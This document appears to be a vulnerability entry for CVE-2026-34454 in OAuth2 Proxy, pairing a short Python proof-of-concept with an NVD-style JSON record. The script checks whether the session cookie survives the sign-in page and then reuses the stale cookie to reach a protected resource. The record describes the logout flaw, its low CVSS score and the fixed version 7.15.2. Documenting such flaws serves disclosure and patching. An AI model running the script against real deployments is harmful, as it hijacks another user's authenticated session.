CVE-2026-34454

import requests # Target URL configuration target_url = "https://target-oauth2-proxy.com/" sign_in_url = "https://target-oauth2-proxy.com/oauth2/sign_in" # Create a session to simulate a browser session = requests.Session() # Step 1: Simulate a session that a user left behind # In a real scenario, this cookie is obtained after authentication session.cookies.set("_oauth2_proxy", "VALID_SESSION_COOKIE_TOKEN_HERE") print("[*] Simulating user logout by visiting sign-in page...") # Step 2: Trigger the logout flow (rendering the sign-in page) # The vulnerability occurs when the sign-in page is rendered as part of logout response = session.get(sign_in_url) # Step 3: Check if the session cookie persists after logout remaining_cookie = session.cookies.get("_oauth2_proxy") if remaining_cookie: print("[+] Vulnerability Confirmed: Session cookie was NOT cleared.") print(f"[+] Cookie Value: {remaining_cookie}") print("[+] A subsequent user on this workstation can still access the session.") # Verify access verify_resp = session.get(target_url) if verify_resp.status_code == 200: print("[+] Successfully accessed protected resource using the stale session.") else: print("[-] Session cookie cleared. System patched or using dedicated logout endpoint.")

{"cve": {"id": "CVE-2026-34454", "sourceIdentifier": "[email protected]", "published": "2026-04-14T23:16:28.167", "lastModified": "2026-04-23T14:15:40.250", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OAuth2 Proxy is a reverse proxy that provides authentication using OAuth2 providers. A regression introduced in 7.11.0 prevents OAuth2 Proxy from clearing the session cookie when rendering the sign-in page. In deployments that rely on the sign-in page as part of their logout flow, a user may be shown the sign-in page while the existing session cookie remains valid, meaning the browser session is not actually logged out. On shared workstations or devices, a subsequent user could continue to use the previous user's authenticated session. Deployments that use a dedicated logout/sign-out endpoint to terminate sessions are not affected. This issue is fixed in 7.15.2"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-384"}, {"lang": "en", "value": "CWE-613"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oauth2_proxy_project:oauth2_proxy:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.11.0", "versionEndExcluding": "7.15.2", "matchCriteriaId": "72445393-2EA7-4F64-BFA4-B6BAD74B21D8"}]}]}], "references": [{"url": "https://github.com/oauth2-proxy/oauth2-proxy/releases/tag/v7.15.2", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/oauth2-proxy/oauth2-proxy/security/advisories/GHSA-f24x-5g9q-753f", "source": "[email protected]", "tags": ["Release Notes"]}]}}